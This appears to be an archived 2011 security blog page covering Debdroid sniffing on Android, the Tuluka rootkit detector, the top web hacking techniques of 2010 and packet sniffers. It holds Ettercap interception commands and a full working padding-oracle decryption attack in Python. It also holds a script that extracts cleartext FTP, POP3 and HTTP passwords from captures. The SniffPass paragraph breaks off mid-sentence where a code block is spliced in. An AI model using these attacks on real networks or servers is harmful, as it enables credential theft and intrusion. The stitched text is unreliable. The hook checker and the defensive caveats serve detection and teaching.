Saturday, February 26, 2011

Debdroid: Run a Network Sniffing Debian System on Android!

The Android phone operating system has grown enormously in the last two years, as the number of Android-powered phones on the market shows. With that growth comes a growing number of tools that help you with 'breakage'. Examples are Android LOIC (which we haven't covered yet), Nmap 5.50 for Android and Droidmap. Now there is Debdroid.

Debdroid lets you run a Debian system on the phone with a collection of utilities for sniffing packets. Besides various other tools and libraries, it contains:

- openssh
- libpcap
- libpcap-dev
- ettercap
- wireshark
- carwhisperer
- btscan
- NMAP
- nbtscan
These come pre-installed in the Debian image. To install, download the image from the links the author provides and follow these steps:

1. Unzip the .zip and .7z files and copy all of the contents to /sdcard/debian/
2. Open your preferred terminal emulator and run bash as root (su).
3. Install Debdroid with: sh /sdcard/debian/debian.sh
4. Boot into Debian with the launcher command: debroid

After it boots you land in a Debian shell (the original post shows a screenshot at this point).

Now for the juice of this Debian, and one of the reasons we like it so much: run Ettercap in promiscuous mode:

ifconfig eth0 promisc
cd /root/tools/
./etrun

That's all; etrun is the author's wrapper script that starts Ettercap. On the HTC EVO builds the author tested, the Wi-Fi interface is named eth0; check ifconfig on your device and substitute the right name (often wlan0). Two caveats a practitioner should keep in mind: promiscuous mode only shows you frames your interface already receives, so to see other clients' traffic on the WLAN Ettercap has to run as a man-in-the-middle (ARP poisoning, its -M arp mode); and 'un-encrypted credentials' means logins sent over plaintext protocols such as HTTP, FTP and POP3, since anything inside TLS stays opaque to the sniffer. Ettercap's -w option writes the capture to a pcap file that you can open later in Wireshark. The author plans to add GUIs for tools such as nmap. Debdroid does not need many dependencies either; it requires just the following:

- Root access
- Busybox
- A kernel that supports loopback devices and ext2 (tested on various CyanogenMod nightly builds, on an HTC EVO to be precise)

Wednesday, February 23, 2011

Tuluka kernel inspector : Rootkit detector

Tuluka is an effective tool for professionals who need to find malicious programs on a Windows system.

Tuluka is a new, powerful anti-rootkit with the following features:

- Detects hidden processes, drivers and devices
- Detects IRP hooks
- Identifies the substitution of certain fields in the DRIVER_OBJECT structure
- Checks driver signatures
- Detects and restores SSDT hooks
- Detects suspicious descriptors in the GDT
- IDT hook detection
- SYSENTER hook detection
- Displays the list of system threads and allows you to suspend them
- IAT and inline hook detection
- Shows the actual values of the debug registers, even when reads of those registers are intercepted by someone
- Finds the system module that contains a given address
- Displays the contents of kernel memory and saves it to disk
- Dumps kernel drivers and the main modules of all processes
- Terminates any process
- Disassembles interrupt and IRP handlers, system services and the start routines of system threads
- Builds the device stack for a selected device
- Much more
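As an added illustration (not Tuluka's code, which this post does not include), this is the principle behind the SSDT and IAT hook checks in the list above: every table entry should point into the module that legitimately owns it, so an entry that resolves into some other driver, or into memory that no loaded module claims, is a hook. The module names, bases, sizes and table addresses below are constructed sample values, not taken from a real system:

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Module:
    """A loaded image: its name and the virtual address range it occupies."""
    name: str
    base: int
    size: int

    def contains(self, addr):
        return self.base <= addr < self.base + self.size


def owner_of(addr, modules):
    """Return the module whose range contains addr, or None if nothing backs it."""
    return next((m for m in modules if m.contains(addr)), None)


def check_ssdt(ssdt, modules, legit=("ntoskrnl.exe", "win32k.sys")):
    """Classify each system-service slot of a (constructed) SSDT.

    'ok'              - points into an image that legitimately provides services
    'hooked:<module>' - points into another loaded driver (a rootkit, but note
                        that some AV products hook the SSDT the same way)
    'hooked:unbacked' - points into memory no module claims (injected code)
    """
    verdicts = []
    for index, target in enumerate(ssdt):
        owner = owner_of(target, modules)
        if owner is None:
            verdicts.append((index, target, "hooked:unbacked"))
        elif owner.name.lower() in legit:
            verdicts.append((index, target, "ok"))
        else:
            verdicts.append((index, target, f"hooked:{owner.name}"))
    return verdicts


def check_iat(iat, modules):
    """Same idea for a process import table: each (function, dll, address)
    entry must resolve inside the DLL the import was linked against."""
    verdicts = []
    for func, dll, addr in iat:
        owner = owner_of(addr, modules)
        if owner is None:
            verdicts.append((func, "hooked:unbacked"))
        elif owner.name.lower() != dll.lower():
            verdicts.append((func, f"hooked:{owner.name}"))
        else:
            verdicts.append((func, "ok"))
    return verdicts


def hooks_only(verdicts):
    """Keep only the entries that did not pass."""
    return [v for v in verdicts if v[-1] != "ok"]


# Constructed sample data: one rootkit driver (evil.sys) hooking a service,
# one SSDT slot pointing into unbacked memory, one user-mode import redirected.
KERNEL_MODULES = [
    Module("ntoskrnl.exe", 0x80400000, 0x21E000),
    Module("hal.dll", 0x80700000, 0x20000),
    Module("evil.sys", 0xF8A00000, 0x4000),
]
SAMPLE_SSDT = [0x80401A00, 0x80402B10, 0xF8A01234, 0x80450000, 0xF9000010]

PROCESS_MODULES = [
    Module("ntdll.dll", 0x7C900000, 0xB2000),
    Module("kernel32.dll", 0x7C800000, 0xF6000),
    Module("hookdll.dll", 0x10000000, 0x8000),
]
SAMPLE_IAT = [
    ("NtQuerySystemInformation", "ntdll.dll", 0x7C90D7FC),
    ("CreateFileW", "kernel32.dll", 0x10001230),  # redirected into hookdll.dll
    ("ReadFile", "kernel32.dll", 0x7C80180E),
]

if __name__ == "__main__":
    for index, target, verdict in hooks_only(check_ssdt(SAMPLE_SSDT, KERNEL_MODULES)):
        print(f"SSDT[{index}] -> 0x{target:08X} {verdict}")
    for func, verdict in hooks_only(check_iat(SAMPLE_IAT, PROCESS_MODULES)):
        print(f"IAT {func}: {verdict}")
```

The range check is only half of what a tool like Tuluka does: it tells you a slot is hooked, and restoring it requires a trusted copy of the original target (read from the on-disk kernel image) rather than whatever the live table says.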

Top 10 Web hacking techniques of 2010 revealed


1. Padding Oracle Crypto Attack -- takes advantage of how Microsoft's ASP.NET web framework reports padding errors when it decrypts AES-CBC protected data such as cookies and view state. The distinguishable error responses act as an oracle that lets an attacker decrypt, and then forge, the ciphertext one byte at a time without knowing the key. (Created by Juliano Rizzo and Thai Duong.)

2. Evercookie -- a JavaScript API that stores a tracking cookie in eight different places within the browser, making it very hard to scrub. Evercookie lets a site re-identify the machine even after the traditional cookies have been removed. (Created by Samy Kamkar.)

3. Hacking Autocomplete -- if the browser feature that automatically completes web forms (autocomplete) is turned on, script on a malicious website can make the browser fill in personal data from the victim's stored form history and read it back. (Created by Jeremiah Grossman.)

4. Attacking HTTPS with Cache Injection -- injecting a malicious JavaScript library into the browser cache (for example while the victim is on an untrusted network) lets an attacker compromise websites protected by SSL that later load that library from the cache. The injected copy keeps working until the cache is cleared. Nearly half of the top 1 million websites use external JavaScript libraries. (Created by Elie Bursztein, Baptiste Gourdin and Dan Boneh.)

5. Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution -- gets around cross-site request forgery defenses and tricks victims into revealing their e-mail addresses. With these, the attacker can reset the victims' passwords and gain access to their accounts. (Created by Lavakumar Kuppan.)

6. Universal XSS in IE8 -- Internet Explorer 8's built-in cross-site scripting filter can be turned against the pages it is meant to protect: by deliberately triggering the filter, an attacker gets the browser to rewrite an otherwise safe page so that attacker-controlled script runs in it. (Created by Eduardo Vela Nava and David Lindsay.)

7. HTTP POST DoS -- the attacker opens many connections and on each sends a POST request whose Content-Length header announces a large body, then sends that body a few bytes at a time. Each connection ties up a server worker for as long as the trickle continues, and enough of them exhaust the server. (Created by Wong Onn Chee and Tom Brennan.)

8. JavaSnoop -- a Java agent attached to the target JVM communicates with the JavaSnoop tool, which lets the tester intercept and tamper with method calls in the running application to look for security weaknesses. It can be a security testing tool or a hacking tool, depending on the user's mindset. (Created by Arshan Dabirsiaghi.)

9. CSS History Hack in Firefox without JavaScript for Intranet Port Scanning -- Cascading Style Sheets, normally used to define the presentation of HTML, can be abused through the :visited selector to learn which URLs are in the victim's browser history while they visit a web page, even with JavaScript disabled. The history information can reveal internal hosts and ports and set the victim up for phishing attacks. (Created by Robert "RSnake" Hansen.)

10. Java Applet DNS Rebinding -- a pair of Java applets point the browser at a pair of attacker-controlled websites in a way that forces it to bypass its DNS cache, making it susceptible to a DNS rebinding attack. (Created by Stefano Di Paola.)
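A runnable illustration of the padding oracle technique behind item 1, added here as an example; it is not code from the original article or from Rizzo and Duong's ASP.NET exploit. To stay self-contained it uses a small hash-based Feistel permutation (toy_encrypt_block) in place of AES, plus a constructed key, IV and secret cookie value; the attack itself (CBC with PKCS#7 padding, an oracle that only answers "padding valid or not") is the general one and works unchanged against any CBC block cipher:

```python
import hashlib

BLOCK, ROUNDS = 16, 4


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, rnd, half):
    # Keyed, truncated SHA-256 as the Feistel round function. TOY ONLY: a
    # stand-in for AES so the example needs no third-party library.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def toy_encrypt_block(key, block):
    l, r = block[:8], block[8:]
    for i in range(ROUNDS):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r


def toy_decrypt_block(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(ROUNDS)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r


def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if len(data) % BLOCK or not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key, iv, plaintext):
    prev, out, padded = iv, b"", pkcs7_pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        prev = toy_encrypt_block(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return iv + out  # IV travels in the clear with the ciphertext


def cbc_decrypt(key, data):
    prev, out = data[:BLOCK], b""
    for i in range(BLOCK, len(data), BLOCK):
        out += _xor(toy_decrypt_block(key, data[i:i + BLOCK]), prev)
        prev = data[i:i + BLOCK]
    return pkcs7_unpad(out)


class PaddingOracle:
    """Models the vulnerable server: all it leaks is whether the padding of a
    submitted ciphertext was valid (the distinguishable error response)."""
    def __init__(self, key):
        self._key, self.queries = key, 0

    def __call__(self, data):
        self.queries += 1
        try:
            cbc_decrypt(self._key, data)
            return True
        except ValueError:
            return False


def recover_block(oracle, prev, target):
    """Recover one plaintext block given the ciphertext block (or IV) before it."""
    inter = bytearray(BLOCK)  # D_k(target), learned one byte at a time
    for pad in range(1, BLOCK + 1):
        pos = BLOCK - pad
        forged = bytearray(BLOCK)
        for k in range(pos + 1, BLOCK):  # known bytes: force them to decrypt to `pad`
            forged[k] = inter[k] ^ pad
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pad == 1:
                # A hit could also be ...\x02\x02 etc.; flipping the byte before
                # the last one breaks every padding except a genuine \x01.
                probe = bytearray(forged)
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe) + target):
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("oracle never accepted a padding byte")
    return _xor(inter, prev)


def padding_oracle_decrypt(oracle, data):
    """Decrypt IV||C1||...||Cn with no key, using only valid/invalid answers."""
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    plain = b"".join(recover_block(oracle, blocks[i - 1], blocks[i])
                     for i in range(1, len(blocks)))
    return pkcs7_unpad(plain)


def demo(key=b"constructed-key!", iv=b"\x00" * BLOCK,
         secret=b"user=admin; role=superuser"):
    """Constructed key/IV/secret stand in for the server's cookie-protection key."""
    oracle = PaddingOracle(key)
    return padding_oracle_decrypt(oracle, cbc_encrypt(key, iv, secret)), oracle.queries


if __name__ == "__main__":
    recovered, queries = demo()
    print(recovered, "after", queries, "oracle queries")
```

The cost is at most 256 oracle queries per byte (about 128 on average), which is why the fix is not a faster error page but an authenticated encryption scheme (encrypt-then-MAC, or an AEAD mode) that rejects any modified ciphertext with the same response before the padding is ever examined.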

Tuesday, February 22, 2011

5 Best Free Network Packet Analyzer Tools!

A network packet analyzer is a program that helps a network administrator capture and interactively browse the packets travelling on a computer network and analyze the traffic.

1. Wireshark: Wireshark is the most popular free network packet sniffer and runs on Unix-like systems as well as Windows. It captures live network packets in real time and intelligently decodes them according to their protocol, displaying the captured data in a GUI. It can even detect and capture VoIP calls and, in some cases, play back the media.
On top of that, the Wireshark website provides tons of resources, including videos, on how to use Wireshark and analyze the captured data.


2. Microsoft Network Monitor: Microsoft Network Monitor is a free network packet analyzer that works on Windows only. It shows all network traffic in real time in an intuitive GUI and can capture and decode more than 300 public and Microsoft-proprietary network protocols, including wireless network packets.
It can be used by beginners to analyze their home network traffic, or by network administrators to analyze an entire organization's network by sniffing its packets.

3. Capsa Packet Sniffer: Capsa is a must-have freeware network packet analyzer for network administrators who want to monitor, troubleshoot and diagnose their network. The free version comes with plenty of features and is good enough for home use as well as small businesses.
The free Capsa Packet Sniffer lets you monitor and capture traffic for up to 50 IP addresses at once and analyze it effectively in real time.
Capsa Packet Sniffer features:

- Detailed traffic monitoring of all computers
- Bandwidth monitoring (to find which computers are watching online videos)
- Network diagnosis to identify problems in the network
- Network activity logging (for recording IM and web mail)
- Network behavior monitoring

4. InnoNWSniffer: The name stands for Inno Network Sniffer. Despite the name, it was developed as a small IP scanner rather than a packet capture tool: it can scan live public IPs and any computer on the LAN, and it reports detailed system information about them.


5. SniffPass
SniffPass is a unique packet sniffer that focuses on capturing passwords from network traffic. Once activated, it keeps monitoring network traffic and, as soon as it intercepts a password, shows it on screen. This is a handy way to recover forgotten website passwords, and equally a reminder that anything sent over a cleartext protocol can be read by whoever shares the network.
SniffPass is easy to use and provides a nice GUI for all captured passwords. It supports most of the common cleartext protocols, like POP3, IMAP4, SMTP, FTP, and
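As an added example (not code from SniffPass, Debdroid or this post), this is the core of what a password sniffer does with the kind of capture that the Debdroid Ettercap run above produces: read a libpcap file, pick out the TCP payloads, and pull cleartext logins out of FTP and POP3 USER/PASS exchanges and HTTP Basic Authorization headers. The capture is constructed in memory from made-up frames (TEST-NET addresses 192.0.2.10 and 192.0.2.20, invented usernames and passwords), so it runs offline; a real pcap written by ettercap -w or Wireshark can be passed to extract_credentials() instead.

```python
import base64
import socket
import struct

CLIENT, SERVER = "192.0.2.10", "192.0.2.20"       # TEST-NET-1 addresses, constructed
CLEARTEXT_LOGIN_PORTS = {21: "ftp", 110: "pop3"}  # protocols with USER/PASS logins


def _frame(src, sport, dst, dport, payload):
    """Build one Ethernet/IPv4/TCP frame. Checksums stay zero; parsing ignores them."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst)) + tcp
    return b"\x02" * 6 + b"\x04" * 6 + b"\x08\x00" + ip


def build_sample_pcap():
    """A constructed capture: FTP and POP3 logins, an HTTP Basic request, TLS noise."""
    frames = [
        _frame(CLIENT, 40001, SERVER, 21, b"USER alice\r\n"),
        _frame(SERVER, 21, CLIENT, 40001, b"331 Password required\r\n"),
        _frame(CLIENT, 40001, SERVER, 21, b"PASS s3cret\r\n"),
        _frame(CLIENT, 40002, SERVER, 110, b"USER bob@example.test\r\n"),
        _frame(CLIENT, 40002, SERVER, 110, b"PASS hunter2\r\n"),
        _frame(CLIENT, 40003, SERVER, 80,
               b"GET /admin HTTP/1.1\r\nHost: intranet.example.test\r\n"
               b"Authorization: Basic " + base64.b64encode(b"carol:Passw0rd") + b"\r\n\r\n"),
        _frame(CLIENT, 40004, SERVER, 443, b"\x16\x03\x01\x00\x05hello"),  # TLS: opaque
    ]
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    records = b"".join(struct.pack("<IIII", 1298700000 + i, 0, len(f), len(f)) + f
                       for i, f in enumerate(frames))
    return header + records


def _pcap_frames(data):
    """Yield raw frames from a classic libpcap file, honouring its byte order."""
    endian = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}.get(data[:4])
    if endian is None:
        raise ValueError("not a libpcap capture")
    if struct.unpack(endian + "I", data[20:24])[0] != 1:
        raise ValueError("only the Ethernet link type is handled here")
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack(endian + "IIII", data[off:off + 16])[2]
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def _tcp_payload(frame):
    """Return (src, sport, dst, dport, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
        return None
    ihl, total = (frame[14] & 0x0F) * 4, struct.unpack("!H", frame[16:18])[0]
    src, dst = socket.inet_ntoa(frame[26:30]), socket.inet_ntoa(frame[30:34])
    t = 14 + ihl
    sport, dport = struct.unpack("!HH", frame[t:t + 4])
    doff = (frame[t + 12] >> 4) * 4
    return src, sport, dst, dport, frame[t + doff:14 + total]


def extract_credentials(pcap_bytes):
    """Return [(protocol, server, user, password), ...] for every cleartext login."""
    found, pending_user = [], {}  # pending_user: flow -> USER seen, PASS not yet
    for frame in _pcap_frames(pcap_bytes):
        pkt = _tcp_payload(frame)
        if pkt is None:
            continue
        src, sport, dst, dport, payload = pkt
        flow = (src, sport, dst, dport)
        for line in payload.split(b"\r\n"):
            if dport in CLEARTEXT_LOGIN_PORTS:
                cmd, _, arg = line.partition(b" ")
                if cmd.upper() == b"USER":
                    pending_user[flow] = arg.decode(errors="replace")
                elif cmd.upper() == b"PASS" and flow in pending_user:
                    found.append((CLEARTEXT_LOGIN_PORTS[dport], dst,
                                  pending_user.pop(flow), arg.decode(errors="replace")))
            elif dport in (80, 8080) and line.lower().startswith(b"authorization: basic "):
                try:
                    user, _, pw = base64.b64decode(line[21:].strip()).partition(b":")
                except ValueError:
                    continue
                found.append(("http-basic", dst, user.decode(errors="replace"),
                              pw.decode(errors="replace")))
    return found


if __name__ == "__main__":
    for proto, server, user, password in extract_credentials(build_sample_pcap()):
        print(f"{proto:10} {server:15} {user} / {password}")
```

The TLS frame on port 443 is deliberately left untouched: the parser never sees a login there, which is the whole argument for moving mail and file transfer onto TLS-protected ports. The parser works on single packets, so a USER or PASS line split across two TCP segments would be missed; a production sniffer reassembles the stream first.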

Sunday, February 13, 2011